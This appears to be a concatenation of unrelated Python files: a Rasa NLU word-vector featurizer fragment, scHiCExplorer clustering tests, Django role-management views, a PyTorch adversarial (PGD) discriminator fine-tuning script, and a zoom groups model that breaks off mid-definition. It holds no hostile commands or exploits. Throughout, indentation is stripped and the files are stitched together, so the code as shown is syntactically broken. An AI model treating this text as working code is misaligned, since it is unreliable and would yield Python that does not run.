m = nn.MaxPool1d(stride, stride)
arr = torch.from_numpy(data[i]).reshape(1, 1, -1)
arr = m(arr)
arr = arr.reshape(1, -1)
all_data[i] = arr[0].data.numpy()
return np.squeeze(all_data)
def _k_max_pooling(self,data):
import torch
all_data = np.zeros((len(data), data[0].shape[1]), dtype=np.float32)
for i in range(len(data)):
arr = torch.from_numpy(data[i]).reshape(-1)
stride = data[i].shape[1]
ind = arr.topk(stride)[1].sort()
all_data[i] = arr[ind[0]].data.numpy()
return np.squeeze(all_data)
def _get_message_text(self, message):
all_tokens = []
all_t=[]
for t in message.get("tokens"):
text = self._replace_number(t.text)
all_t.append(text)
if self.category == 'word2vec':
if text in self.model.vocab:
    all_tokens.append(self.model[text])
else:
    # Out-of-vocabulary tokens fall back to a zero vector.
    all_tokens.append(np.zeros((self.model.vector_size,)))
all_tokens = [np.vstack(tuple(all_tokens))]
if self.category == 'elmo':
all_tokens = self.model.sents2elmo([all_t])
single_token = self._k_max_pooling(all_tokens)
return single_token
def train(self, training_data, cfg=None, **kwargs):
tokens_text = [self._get_message_text(example) for example in training_data.intent_examples]
X = np.array(tokens_text)
for i, example in enumerate(training_data.intent_examples):
example.set("text_features", self._combine_with_existing_text_features(example, X[i]))
def process(self, message, **kwargs):
# type: (Message, **Any) -> None
message_text = self._get_message_text(message)
message.set("text_features", self._combine_with_existing_text_features(message, message_text))
@classmethod
def load(cls,
model_dir=None, # type: Text
model_metadata=None, # type: Metadata
cached_component=None, # type: Optional[Component]
**kwargs  # type: Any
):
meta = model_metadata.for_component(cls.name)
if model_dir:
vector_file = meta.get("vector")
elmo_file = meta.get("elmo")
if vector_file:
import gensim
model = gensim.models.KeyedVectors.load_word2vec_format(vector_file, binary=False, limit=meta.get("limit"))
category = 'word2vec'
elif elmo_file:
from rasa_nlu_gao.models.elmo_cn import Embedder
model = Embedder(elmo_file)
category = 'elmo'
return WordVectorsFeaturizer(
component_config=meta,
model=model,
category=category)
else:
logger.warning("Failed to load featurizer. Maybe path {} "
"doesn't exist".format(os.path.abspath(model_dir)))
return WordVectorsFeaturizer(meta)
|
import warnings
warnings.simplefilter(action="ignore", category=RuntimeWarning)
warnings.simplefilter(action="ignore", category=PendingDeprecationWarning)
import pytest
import os
from tempfile import NamedTemporaryFile, mkdtemp
from matplotlib.testing.compare import compare_images
from schicexplorer import scHicClusterMinHash
ROOT = os.path.join(os.path.dirname(os.path.abspath(__file__)), "test-data/")
tolerance = 60
def are_files_equal(file1, file2, delta=2, skip=0):
equal = True
if delta:
mismatches = 0
with open(file1) as textfile1, open(file2) as textfile2:
for i, (x, y) in enumerate(zip(textfile1, textfile2)):
if i < skip:
continue
if x != y:
if delta:
mismatches += 1
if mismatches > delta:
equal = False
break
else:
equal = False
break
return equal
def are_files_equal_clustering(file1, file2, number_of_clusters=3, delta=2, skip=0):
equal = True
if delta:
mismatches = 0
numberOfClusters = set()
with open(file1) as textfile1, open(file2) as textfile2:
for i, (x, y) in enumerate(zip(textfile1, textfile2)):
if i < skip:
continue
x = x.split(' ')
y = y.split(' ')
numberOfClusters.add(y[1])
x[0] = x[0].lstrip('/cells/')
y[0] = y[0].lstrip('/cells/')
if x[0] != y[0]:
if delta:
mismatches += 1
if mismatches > delta:
equal = False
break
else:
equal = False
break
if len(numberOfClusters) == number_of_clusters:
    return equal
return False
def test_kmeans():
outfile = NamedTemporaryFile(suffix='.txt', delete=False)
outfile.close()
args = "--matrix {} --numberOfClusters {} --clusterMethod {} \
--outFileName {} -t {} -nh {} -dim_pca 100".format(ROOT + 'test_matrix.scool',
3, 'kmeans', outfile.name, 3, 800).split()
scHicClusterMinHash.main(args)
assert are_files_equal_clustering(ROOT + "scHicClusterMinHash/cluster_kmeans.txt", outfile.name)
def test_agglomerative_ward():
outfile = NamedTemporaryFile(suffix='.txt', delete=False)
outfile.close()
args = "--matrix {} --numberOfClusters {} --clusterMethod {} \
--outFileName {} -t {} -nh {} --noPCA".format(ROOT + 'test_matrix.scool',
3, 'agglomerative_ward', outfile.name, 3, 800).split()
scHicClusterMinHash.main(args)
assert are_files_equal_clustering(ROOT + "scHicClusterMinHash/cluster_kmeans.txt", outfile.name)
def test_agglomerative_complete():
outfile = NamedTemporaryFile(suffix='.txt', delete=False)
outfile.close()
args = "--matrix {} --numberOfClusters {} --clusterMethod {} \
--outFileName {} -t {} -nh {} --noPCA ".format(ROOT + 'test_matrix.scool',
3, 'agglomerative_complete', outfile.name, 3, 800).split()
scHicClusterMinHash.main(args)
assert are_files_equal_clustering(ROOT + "scHicClusterMinHash/cluster_kmeans.txt", outfile.name)
def test_agglomerative_average():
outfile = NamedTemporaryFile(suffix='.txt', delete=False)
outfile.close()
args = "--matrix {} --numberOfClusters {} --clusterMethod {} \
--outFileName {} -t {} -nh {} --noPCA ".format(ROOT + 'test_matrix.scool',
3, 'agglomerative_average', outfile.name, 3, 800).split()
scHicClusterMinHash.main(args)
assert are_files_equal_clustering(ROOT + "scHicClusterMinHash/cluster_kmeans.txt", outfile.name)
def test_agglomerative_single():
outfile = NamedTemporaryFile(suffix='.txt', delete=False)
outfile.close()
args = "--matrix {} --numberOfClusters {} --clusterMethod {} \
--outFileName {} -t {} -nh {} --noPCA ".format(ROOT + 'test_matrix.scool',
3, 'agglomerative_single', outfile.name, 3, 800).split()
scHicClusterMinHash.main(args)
assert are_files_equal_clustering(ROOT + "scHicClusterMinHash/cluster_kmeans.txt", outfile.name)
def test_birch():
outfile = NamedTemporaryFile(suffix='.txt', delete=False)
outfile.close()
args = "--matrix {} --numberOfClusters {} --clusterMethod {} \
--outFileName {} -t {} -nh {} -dim_pca 50".format(ROOT + 'test_matrix.scool',
3, 'birch', outfile.name, 3, 800).split()
scHicClusterMinHash.main(args)
assert are_files_equal_clustering(ROOT + "scHicClusterMinHash/cluster_kmeans.txt", outfile.name)
def test_spectral():
outfile = NamedTemporaryFile(suffix='.txt', delete=False)
outfile.close()
args = "--matrix {} --numberOfClusters {} --clusterMethod {} \
--outFileName {} -t {} -nh {}".format(ROOT + 'test_matrix.scool',
3, 'spectral', outfile.name, 2, 800).split()
scHicClusterMinHash.main(args)
assert are_files_equal_clustering(ROOT + "scHicClusterMinHash/cluster_spectral.txt", outfile.name)
def test_spectral_chromosomes():
outfile = NamedTemporaryFile(suffix='.txt', delete=False)
outfile.close()
args = "--matrix {} --numberOfClusters {} --clusterMethod {} \
--outFileName {} -t {} -nh {} --chromosomes {} ".format(ROOT + 'test_matrix.scool',
3, 'spectral', outfile.name, 2, 800, "chr1 chr2").split()
scHicClusterMinHash.main(args)
assert are_files_equal_clustering(ROOT + "scHicClusterMinHash/cluster_spectral_chromosomes.txt", outfile.name)
# some issue with the test data, real world data works fine
@pytest.mark.xfail
def test_kmeans_euclidean():
outfile = NamedTemporaryFile(suffix='.txt', delete=False)
outfile.close()
args = "--matrix {} --numberOfClusters {} --clusterMethod {} \
--outFileName {} -t {} -nh {} --euclideanModeMinHash ".format(ROOT + 'test_matrix.scool',
3, 'kmeans', outfile.name, 2, 800).split()
scHicClusterMinHash.main(args)
assert are_files_equal_clustering(ROOT + "scHicClusterMinHash/cluster_kmeans_exact.txt", outfile.name)
# some issue with the test data, real world data works fine
# @pytest.mark.xfail
def test_spectral_euclidean():
outfile = NamedTemporaryFile(suffix='.txt', delete=False)
outfile_plot = NamedTemporaryFile(prefix='pca_plot_', delete=False)
outfile.close()
args = "--matrix {} --numberOfClusters {} --clusterMethod {} \
--outFileName {} -t {} -nh {} --euclideanModeMinHash -csp {} --colorMap {} --dpi {} --fontsize {} --figuresize {} {}".format(ROOT + 'test_matrix.scool',
3, 'spectral', outfile.name, 2, 800, outfile_plot.name,
'tab10', 100, 5, 10, 5).split()
scHicClusterMinHash.main(args)
assert are_files_equal_clustering(ROOT + "scHicClusterMinHash/cluster_spectral_euclidean.txt", outfile.name)
res = compare_images(ROOT + "scHicClusterMinHash/plot_pc1_pc2.png", outfile_plot.name + '.png', tolerance)
assert res is None, res
res = compare_images(ROOT + "scHicClusterMinHash/plot_pc2_pc3.png", outfile_plot.name + '.png', tolerance)
assert res is None, res
def test_kmeans_saveMemory():
outfile = NamedTemporaryFile(suffix='.txt', delete=False)
outfile.close()
args = "--matrix {} --numberOfClusters {} --clusterMethod {} \
--outFileName {} -t {} -nh {} -dim_pca 100 --saveMemory".format(ROOT + 'test_matrix.scool',
3, 'kmeans', outfile.name, 3, 800).split()
scHicClusterMinHash.main(args)
assert are_files_equal_clustering(ROOT + "scHicClusterMinHash/cluster_kmeans.txt", outfile.name)
def test_agglomerative_single_saveMemory():
outfile = NamedTemporaryFile(suffix='.txt', delete=False)
outfile.close()
args = "--matrix {} --numberOfClusters {} --clusterMethod {} \
--outFileName {} -t {} -nh {} --noPCA --saveMemory".format(ROOT + 'test_matrix.scool',
3, 'agglomerative_single', outfile.name, 3, 800).split()
scHicClusterMinHash.main(args)
assert are_files_equal_clustering(ROOT + "scHicClusterMinHash/cluster_kmeans.txt", outfile.name)
def test_kmeans_euclidean_saveMemory():
outfile = NamedTemporaryFile(suffix='.txt', delete=False)
outfile.close()
args = "--matrix {} --numberOfClusters {} --clusterMethod {} \
--outFileName {} -t {} -nh {} --euclideanModeMinHash --saveMemory ".format(ROOT + 'test_matrix.scool',
3, 'kmeans', outfile.name, 2, 800).split()
scHicClusterMinHash.main(args)
assert are_files_equal_clustering(ROOT + "scHicClusterMinHash/cluster_kmeans_exact.txt", outfile.name)
def test_version():
args = "--version".split()
with pytest.raises(SystemExit) as pytest_wrapped_e:
scHicClusterMinHash.main(args)
assert pytest_wrapped_e.type == SystemExit
assert pytest_wrapped_e.value.code == 0
def test_help():
args = "--help".split()
with pytest.raises(SystemExit) as pytest_wrapped_e:
scHicClusterMinHash.main(args)
assert pytest_wrapped_e.type == SystemExit
assert pytest_wrapped_e.value.code == 0
|
#-*- coding: utf-8 -*-
from django.core.urlresolvers import reverse
from django.http import HttpResponse,HttpResponseRedirect
from django.shortcuts import render_to_response
from django.template import RequestContext
from django.contrib.auth.decorators import login_required
from accounts.views.permission import PermissionVerify
from UserManage.forms import RoleListForm
from accounts.models import RoleList
@login_required
@PermissionVerify()
def AddRole(request):
if request.method == "POST":
form = RoleListForm(request.POST)
if form.is_valid():
form.save()
return HttpResponseRedirect(reverse('listroleurl'))
else:
form = RoleListForm()
kwvars = {
'form':form,
'request':request,
}
return render_to_response('UserManage/role.add.html',kwvars,RequestContext(request))
@login_required
@PermissionVerify()
def ListRole(request):
mList = RoleList.objects.all()
# Pagination
lst = SelfPaginator(request, mList, 20)
kwvars = {
'lPage':lst,
'request':request,
}
return render_to_response('UserManage/role.list.html',kwvars,RequestContext(request))
@login_required
@PermissionVerify()
def EditRole(request,ID):
iRole = RoleList.objects.get(id=ID)
if request.method == "POST":
form = RoleListForm(request.POST,instance=iRole)
if form.is_valid():
form.save()
return HttpResponseRedirect(reverse('listroleurl'))
else:
form = RoleListForm(instance=iRole)
kwvars = {
'ID':ID,
'form':form,
'request':request,
}
return render_to_response('UserManage/role.edit.html',kwvars,RequestContext(request))
@login_required
@PermissionVerify()
def DeleteRole(request,ID):
RoleList.objects.filter(id = ID).delete()
return HttpResponseRedirect(reverse('listroleurl'))
|
#!/usr/bin/env python
import sys
import argparse
import torch
import torch.nn as nn
import torch.backends.cudnn as cudnn
from torch.autograd import Variable
import torchvision.transforms as tfs
from torchvision.datasets import ImageFolder, CIFAR10
from torch.utils.data import DataLoader
from miscs.pgd import attack_label_Linf_PGD
cudnn.benchmark = True
parser = argparse.ArgumentParser()
parser.add_argument('--model', type=str, required=True)
parser.add_argument('--netD', type=str, required=True)
parser.add_argument('--netG', type=str, required=True)
parser.add_argument('--ndf', type=int, required=True)
parser.add_argument('--ngf', type=int, required=True)
parser.add_argument('--nclass', type=int, required=True)
parser.add_argument('--nz', type=int, default=128)
parser.add_argument('--dataset', type=str, required=True)
parser.add_argument('--batch_size', type=int, required=True)
parser.add_argument('--root', type=str, required=True)
parser.add_argument('--start_width', type=int, default=4)
parser.add_argument('--img_width', type=int, required=True)
parser.add_argument('--steps', type=int, required=True)
parser.add_argument('--epsilon', type=float, required=True)
parser.add_argument('--lam', type=float, required=True)
parser.add_argument('--lr', type=float, required=True)
parser.add_argument('--ngpu', type=int, required=True)
parser.add_argument('--workers', type=int, default=3)
parser.add_argument('--out_f', type=str, required=True)
opt = parser.parse_args()
def load_models():
if opt.model == "resnet_32":
from gen_models.resnet_32 import ResNetGenerator
from dis_models.preact_resnet import PreActResNet18
gen = ResNetGenerator(ch=opt.ngf, dim_z=opt.nz, bottom_width=opt.start_width, n_classes=opt.nclass)
dis = PreActResNet18()
elif opt.model == "resnet_64":
from gen_models.resnet_64 import ResNetGenerator
from dis_models.resnet_64 import ResNetAC
gen = ResNetGenerator(ch=opt.ngf, dim_z=opt.nz, bottom_width=opt.start_width, n_classes=opt.nclass)
dis = ResNetAC(ch=opt.ndf, n_classes=opt.nclass)
elif opt.model == "resnet_128":
from gen_models.resnet_small import ResNetGenerator
from dis_models.resnet_small import ResNetAC
gen = ResNetGenerator(ch=opt.ngf, dim_z=opt.nz, bottom_width=opt.start_width, n_classes=opt.nclass)
dis = ResNetAC(ch=opt.ndf, n_classes=opt.nclass, bn=True) #XXX here we choose bn=True, because of improper initialization
elif opt.model == "resnet_imagenet":
from gen_models.resnet import ResNetGenerator
from dis_models.resnet import ResNetAC
gen = ResNetGenerator(ch=opt.ngf, dim_z=opt.nz, bottom_width=opt.start_width, n_classes=opt.nclass)
dis = ResNetAC(ch=opt.ndf, n_classes=opt.nclass)
else:
raise ValueError(f"Unknown model name: {opt.model}")
if opt.ngpu > 0:
gen, dis = gen.cuda(), dis.cuda()
gen, dis = torch.nn.DataParallel(gen, device_ids=range(opt.ngpu)), \
torch.nn.DataParallel(dis, device_ids=range(opt.ngpu))
else:
raise ValueError("Must run on gpus, ngpu > 0")
gen.load_state_dict(torch.load(opt.netG))
dis.load_state_dict(torch.load(opt.netD))
return gen, dis
def make_dataset():
if opt.dataset == "cifar10":
trans = tfs.Compose([
tfs.RandomCrop(opt.img_width, padding=4),
tfs.RandomHorizontalFlip(),
tfs.ToTensor(),
tfs.Normalize(mean=[.5, .5, .5], std=[.5, .5, .5])
])
data = CIFAR10(root=opt.root, train=True, download=False, transform=trans)
data_test = CIFAR10(root=opt.root, train=False, download=False, transform=trans)
loader = DataLoader(data, batch_size=opt.batch_size, shuffle=True, num_workers=opt.workers)
loader_test = DataLoader(data_test, batch_size=opt.batch_size, shuffle=True, num_workers=opt.workers)
elif opt.dataset == "dog_and_cat_64":
trans = tfs.Compose([
tfs.RandomResizedCrop(opt.img_width, scale=(0.8, 0.9), ratio=(1.0, 1.0)),
tfs.RandomHorizontalFlip(),
tfs.ToTensor(),
tfs.Normalize(mean=[.5, .5, .5], std=[.5, .5, .5]),
])
data = ImageFolder(opt.root, transform=trans)
data_test = ImageFolder("/data3/sngan_dog_cat_val", transform=trans)
loader = DataLoader(data, batch_size=opt.batch_size, shuffle=True, num_workers=opt.workers)
loader_test = DataLoader(data_test, batch_size=opt.batch_size, shuffle=True, num_workers=opt.workers)
elif opt.dataset == "dog_and_cat_128":
trans = tfs.Compose([
tfs.RandomResizedCrop(opt.img_width, scale=(0.8, 0.9), ratio=(1.0, 1.0)),
tfs.RandomHorizontalFlip(),
tfs.ToTensor(),
tfs.Normalize(mean=[.5, .5, .5], std=[.5, .5, .5]),
])
data = ImageFolder(opt.root, transform=trans)
data_test = ImageFolder("/nvme0/sngan_dog_cat_val", transform=trans)
loader = DataLoader(data, batch_size=opt.batch_size, shuffle=True, num_workers=opt.workers)
loader_test = DataLoader(data_test, batch_size=opt.batch_size, shuffle=True, num_workers=opt.workers)
elif opt.dataset == "imagenet":
trans = tfs.Compose([
tfs.RandomResizedCrop(opt.img_width, scale=(0.8, 0.9), ratio=(1.0, 1.0)),
tfs.RandomHorizontalFlip(),
tfs.ToTensor(),
tfs.Normalize(mean=[.5, .5, .5], std=[.5, .5, .5]),
])
data = ImageFolder(opt.root, transform=trans)
loader = DataLoader(data, batch_size=opt.batch_size, shuffle=True, num_workers=opt.workers)
# No separate validation split is provided for imagenet, so reuse the training
# loader for the test pass to keep make_dataset's return values consistent.
loader_test = loader
else:
raise ValueError(f"Unknown dataset: {opt.dataset}")
return loader, loader_test
def test_acc(loader_test, dis):
total = 0
correct_label = 0
for i, (x_real, y_real) in enumerate(loader_test):
if i == 100:
break
x_real, y_real = x_real.cuda(), y_real.cuda()
v_y_real, v_x_real = Variable(y_real), Variable(x_real)
adv_input = attack_label_Linf_PGD(v_x_real, v_y_real, dis, opt.steps * 4, opt.epsilon)
with torch.no_grad():
_, d_multi = dis(adv_input)
_, idx = torch.max(d_multi.data, dim=1)
label_correct = idx.eq(y_real)
correct_label += torch.sum(label_correct).item()
total += y_real.numel()
print(f'test_acc: {correct_label/total}')
def get_optimizer(parameters):
#optimizer = torch.optim.SGD(dis.parameters(), lr=opt.lr, momentum=0.9, weight_decay=5.0e-4)
return torch.optim.Adam(parameters, lr=opt.lr)
def main():
# model
gen, dis = load_models()
# data
loader, loader_test = make_dataset()
# optimizer
optimizer = get_optimizer(dis.parameters())
# loss function
loss_f = nn.CrossEntropyLoss()
# buffer
noise = torch.FloatTensor(opt.batch_size, opt.nz).zero_().cuda()
noise_v = Variable(noise)
noise_y = torch.LongTensor(opt.batch_size).zero_().cuda()
noise_y_v = Variable(noise_y)
epochs = [20, 20, 10, 10]
accumulate = 0
for stage in epochs:
for _ in range(stage):
accumulate += 1
for it, (x, y) in enumerate(loader):
# feed real images
x, y = x.cuda(), y.cuda()
vx_real, vy = Variable(x), Variable(y)
vx_real_adv = attack_label_Linf_PGD(vx_real, vy, dis,
opt.steps, opt.epsilon)
_, output_real = dis(vx_real_adv)
loss_real = loss_f(output_real, vy)
# feed fake images
if opt.lam > 0:
noise_v.normal_(0, 1)
noise_y.random_(0, to=opt.nclass)
with torch.no_grad():
vx_fake = gen(noise_v, noise_y_v)
vx_fake_adv = attack_label_Linf_PGD(vx_fake, noise_y_v,
dis, opt.steps, opt.epsilon)
_, output_fake = dis(vx_fake_adv)
loss_fake = loss_f(output_fake, noise_y_v)
# combined loss
loss_total = loss_real + opt.lam * loss_fake
else:
loss_total = loss_real
dis.zero_grad()
loss_total.backward()
optimizer.step()
# accuracy on real / fake
_, idx = torch.max(output_real, dim=1)
correct_real = torch.sum(y.eq(idx.data)).item()
accuracy_real = correct_real / y.numel()
if opt.lam > 0:
_, idx = torch.max(output_fake, dim=1)
correct_fake = torch.sum(noise_y.eq(idx.data)).item()
accuracy_fake = correct_fake / noise_y.numel()
print(f'[{accumulate}][{it}/{len(loader)}] acc_real: {accuracy_real}, acc_fake: {accuracy_fake}')
else:
print(f'[{accumulate}][{it}/{len(loader)}] acc_real: {accuracy_real}, acc_fake: NA')
sys.stdout.flush()
# test
test_acc(loader_test, dis)
# save model
torch.save(dis.state_dict(), f'./{opt.out_f}/dis_finetune_{accumulate}.pth')
opt.lr /= 10
#optimizer = torch.optim.SGD(dis.parameters(), lr=opt.lr, momentum=0.9, weight_decay=5.0e-4)
optimizer = get_optimizer(dis.parameters())
if __name__ == "__main__":
main()
|
"""
zoom.models
common models
"""
import logging
import zoom
from zoom.helpers import link_to, url_for_item, url_for
from zoom.utils import Record
from zoom.records import RecordStore
from zoom.users import Users
from zoom.audit import audit
class Model(zoom.utils.DefaultRecord):
"""Model Superclass
Provide basic model properties and functions.
Subclass this to create a Model that can be stored in
a RecordStore, EntityStore or some other type of store.
Assumes every record has an id attribute. If not, you
will need to provide one via an additional property
defined in the subclass.
The key can end up being just the str of the id, however
it is provided separately to make it easy to provide human
friendly keys typically used in REST style URLs. If used
this way the key should be generated such that it is unique
for each record.
>>> from zoom.utils import Bunch
>>> zoom.system.site = site = zoom.sites.Site()
>>> zoom.system.user = zoom.system.site.users.get(1)
>>> zoom.system.request = Bunch(route=[], app=Bunch(name=__name__))
>>> class MyModel(Model):
... pass
>>> thing = MyModel(name='Pat Smith')
>>> thing.name
'Pat Smith'
>>> thing.key
'pat-smith'
>>> url_for_item('pat-smith')
'/pat-smith'
>>> thing.url
'/pat-smith'
>>> thing.link
'<a href="/pat-smith" name="link-to-pat-smith">Pat Smith</a>'
>>> thing.allows('user', 'edit')
False
"""
@property
def key(self):
"""Return the key"""
return zoom.utils.id_for(self.name)
@property
def url(self):
"""Return a valid URL"""
return url_for_item(self.key)
@property
def link(self):
"""Return a link"""
return link_to(self.name, self.url)
def allows(self, user, action):
return False
def get_users(db, group):
"""Get users of a Group
Gets the users that are members of a group from a given database.
>>> site = zoom.sites.Site()
>>> users_group = Groups(site.db).first(name='users')
>>> get_users(site.db, users_group)
{2}
"""
my_users = {
user_id
for user_id, in db("""
select distinct
users.id
from users, members
where
users.id = members.user_id
and group_id = %s
""",
group.group_id)
}
return my_users
class Member(Record):
pass
class Members(RecordStore):
def __init__(self, db, entity=Member):
RecordStore.__init__(
self,
db,
entity,
name='members',
key='id'
)
class Subgroup(Record):
pass
class Subgroups(RecordStore):
def __init__(self, db, entity=Subgroup):
RecordStore.__init__(
self,
db,
entity,
name='subgroups',
key='id'
)
class Group(Record):
"""Zoom Users Group
>>> zoom.system.site = site = zoom.sites.Site()
>>> groups = Groups(site.db)
>>> group = groups.first(name='users')
>>> user = site.users.first(username='admin')
>>> group.allows(user, 'edit')
True
>>> group.key
'2'
>>> group.url
'/admin/groups/2'
>>> group.link
'<a href="/admin/groups/2" name="link-to-users">users</a>'
>>> group.roles
{4}
>>> zoom.utils.pp(group.apps)
{
10,
12,
20,
28,
29
}
>>> groups.first(name='everyone').subgroups
{2, 3}
>>> groups.first(name='users').user_ids
[2]
>>> {u.username for u in site.users.get(groups.first(name='users').user_ids)}
{'user'}
"""
@property
def group_id(self):
"""Return the group ID"""
return self._id
@property
def key(self):
"""Return the group key"""
return str(self._id)
@property
def url(self):
"""return the group URL"""
return url_for('/admin/groups/{}'.format(self.key))
@property
def link(self):
"""user as link"""
return link_to(self.name, self.url)
def allows(self, user, action):
"""access policy"""
system_groups = ['administrators', 'everyone', 'guests', 'managers', 'users']
return self.name not in system_groups or action != 'delete'
def get_users(self):
"""return set of IDs for users that are a member of this group"""
return get_users(self['__store'].db, self)
@property
def is_group_admin_group(self):
"""Return True if this is a group amdin group
Returns bool indicating whether or not members of this group
are able to administer group memberships of any groups on
the system.
"""
groups = self['__store']
return self.group_id in groups.get_group_admin_group_ids()
@property
def users(self):
"""Return list of IDs of users that are part of this group"""
# TODO:
# Ideally, this property would return users, as its name advertises; instead
# it returns user IDs. The user_ids property below is being introduced to
# take its place before this one is fixed, so that clients from this point
# forward have a property whose value is consistent with its name. Plan to
# scan existing systems before switching this over so we don't break things.
return self.get_users()
@property
def user_ids(self):
"""Return list of user IDs of users that are in the group"""
return list(self.get_users())
def add_user(self, user):
"""Add a user to a group"""
store = self.get('__store')
members = Members(store.db)
membership = members.first(group_id=self._id, user_id=user._id)
if not membership:
members.put(Member(group_id=self._id, user_id=user._id))
@property
def roles(self):
"""Return set of IDs of roles that group can assume"""
db = self['__store'].db
my_roles = {
group_id
for group_id, in db("""
select distinct
groups.id
from `groups`, subgroups
where
groups.id = subgroups.group_id
and subgroup_id = %s
and groups.type = 'U'
""",
self._id)
}
return my_roles
@property
def apps(self):
"""Return set of IDs of apps that group can access"""
db = self['__store'].db
my_apps = {
group_id
for group_id, in db("""
select distinct
group_id
from subgroups, groups
where
groups.id = subgroups.group_id
and subgroup_id = %s
and groups.type = 'A'
""",
self._id)
}
return my_apps
def get_app_ids(self):
"""Return set of app group ids"""
return self.apps
def get_app_names(self):
"""Return set of names of app groups"""
groups = self['__store']
lookup = {
g.group_id: g.name[2:]
for g in groups
if (g.name.startswith('a_'))
}
return set(map(lookup.get, self.get_app_ids()))
@property
def app_names(self):
"""Return set of names of app groups"""
return self.get_app_names()
@property
def subgroups(self):
"""Return set of IDs of subgroups that are part of this group"""
db = self['__store'].db
my_subgroups = {
group_id
for group_id, in db("""
select distinct
subgroup_id
from subgroups, groups
where
id = group_id
and group_id = %s
and groups.type = 'U'
""",
self._id)
}
return my_subgroups
@property
def administrators(self):
"""Returns the administrator group name"""
store = self['__store']
admin_group = store.get(self.get('admin_group_id', None))
if admin_group:
return admin_group.name
return 'nothing'
def add_subgroup(self, subgroup):
"""add a subgroup"""
db = self['__store'].db
cmd = """
insert into subgroups (
group_id,
subgroup_id
) values (
%s, %s
)
"""
db(cmd, self.group_id, subgroup.group_id)
audit(
'add subgroup',
self.name,
subgroup.name,
)
def remove_subgroup(self, subgroup):
"""remove a subgroup"""
db = self['__store'].db
cmd = """
delete from subgroups where
group_id=%s and
subgroup_id=%s
"""
db(cmd, self.group_id, subgroup.group_id)
audit(
'remove subgroup',
self.name,
subgroup.name,
)
def update_subgroups_by_id(self, subgroup_ids):
"""Post updated group subgroups"""
groups = self['__store']
updated_subgroups = set(map(int, subgroup_ids))
logger = logging.getLogger(__name__)
debug = logger.debug
debug('updating subgroups: %r', updated_subgroups)
existing_subgroups = self.subgroups
debug('existing subgroups: %r', existing_subgroups)
if updated_subgroups != existing_subgroups:
group_lookup = {
group.group_id: group.name
for group in groups
}
db = groups.db
to_remove = existing_subgroups - updated_subgroups
if to_remove:
debug('removing subgroups %r from %r', to_remove, self.name)
cmd = 'delete from subgroups where group_id=%s and subgroup_id in %s'
db(cmd, self.group_id, to_remove)
for subgroup_id in to_remove:
audit(
'remove subgroup',
self.name,
group_lookup.get(
subgroup_id,
'unknown (%s)' % subgroup_id,
)
)
to_add = updated_subgroups - existing_subgroups
if to_add:
debug('adding %r to %r', to_add, self.name)
cmd = 'insert into subgroups (group_id, subgroup_id) values (%s, %s)'
sequence = zip([self.group_id] * len(to_add), to_add)
db.execute_many(cmd, sequence)
for subgroup_id in to_add:
audit(
'add subgroup',
self.name,
group_lookup.get(
subgroup_id,
'unknown (%s)' % subgroup_id,
)
)
else:
debug('subgroups unchanged')
def update_supergroups_by_id(self, group_ids, kind):
"""Post updated group supergroups"""
updated = set(map(int, group_ids))
logger = logging.getLogger(__name__)
debug = logger.debug
debug('updating %s: %r', kind, updated)
groups = self['__store']
# print(kind)
existing = getattr(self, kind + 's')
debug('existing %s: %r', kind, existing)
# print(updated, existing)
if updated != existing:
group_lookup = {
group.group_id: group.name
for group in groups
}
db = groups.db
to_remove = existing - updated
if to_remove:
debug('removing %s %r from %r', kind, to_remove, self.name)
cmd = 'delete from subgroups where subgroup_id=%s and group_id in %s'
db(cmd, self.group_id, to_remove)
for group_id in to_remove:
audit(
'remove %s' % kind,
group_lookup.get(
group_id,
'unknown (%s)' % group_id,
),
self.name
)
to_add = updated - existing
if to_add:
debug('adding %s %r to %r', kind, to_add, self.name)
cmd = 'insert into subgroups (group_id, subgroup_id) values (%s, %s)'
sequence = zip(to_add, [self.group_id] * len(to_add))
db.execute_many(cmd, sequence)
for subgroup_id in to_add:
audit(
'add %s' % kind,
group_lookup.get(
subgroup_id,
'unknown (%s)' % subgroup_id,
),
self.name
)
else:
debug('%s unchanged', kind)
def update_apps_by_id(self, app_ids):
"""Update apps by app group ids"""
return self.update_supergroups_by_id(app_ids, 'app')
def update_roles_by_id(self, role_ids):
"""Update roles by role group ids"""
return self.update_supergroups_by_id(role_ids, 'role')
def update_members_by_id(self, user_ids):
"""Post updated group memberships"""
updated = set(int(id) for id in user_ids)
logger = logging.getLogger(__name__)
debug = logger.debug
db = self['__store'].db
users = zoom.users.Users(db)
debug('updating members: %r', updated)
cmd = 'select user_id from members where group_id=%s'
existing = set(
user_id for user_id, in
db(cmd, self.group_id)
)
debug('existing members: %r', existing)
if updated != existing:
user_lookup = {
user.user_id: user.username
for user in users
}
to_remove = existing - updated
if to_remove:
debug('removing members: %r', to_remove)
cmd = 'delete from members where group_id=%s and user_id in %s'
db(cmd, self.group_id, to_remove)
for user_id in to_remove:
audit('remove member', self.name, \
user_lookup.get(user_id, 'unknown'))
to_add = updated - existing
if to_add:
debug('adding members: %r', to_add)
cmd = 'insert into members (group_id, user_id) values (%s, %s)'
sequence = zip([self.group_id] * len(to_add), to_add)
db.execute_many(cmd, sequence)
for user_id in to_add:
audit('add member', self.name, \
user_lookup.get(user_id, 'unknown'))
else:
debug('memberships unchanged')
def add_apps(self, app_names):
"""Add apps to the group"""
logger = logging.getLogger(__name__)
debug = logger.debug
groups = self['__store']
for name in app_names:
debug('adding %s', name)
groups.add_app(name)
supergroup = groups.first(name='a_' + name)
if supergroup:
debug('adding supergroup %s to %s', name, self.name)
supergroup.add_subgroup(self)
def remove_apps(self, app_names):
"""Remove apps from the group"""
groups = self['__store']
for name in app_names:
supergroup = groups.first(name='a_' + name)
if supergroup:
supergroup.remove_subgroup(self)
class Groups(RecordStore):
def __init__(self, db, entity=Group):
RecordStore.__init__(
self,
db,
entity,
name='groups',
key='id'
)
def locate(self, locator):
"""locate a group whether it is referred to by reference, id or name"""
return (
isinstance(locator, Group) and locator or
isinstance(locator, int) and self.get(locator) or
isinstance(locator, str) and self.first(name=locator)
)
def add(self, name, group_type='U', description=''):
"""Add a group"""
group_id = self.put(
Group(
name=name,
type=group_type,
description=description,
admin_group_id=1,
)
)
return group_id
def after_insert(self, record):
name = record['name']
group_id = record['_id']
debug = logging.getLogger(__name__).debug
debug('created new group %r (%r)', name, group_id)
audit('create group', name)
def after_update(self, record):
name = record['name']
group_id = record['_id']
debug = logging.getLogger(__name__).debug
debug('updated group %r (%r)', name, group_id)
audit('update group', name)
def after_delete(self, record):
"""After Delete
Adds log entries after a delete has been executed.
"""
debug = logging.getLogger(__name__).debug
debug('deleted group %r (%r)', record['name'], record['group_id'])
audit('delete group', record['name'])
def add_app(self, name):
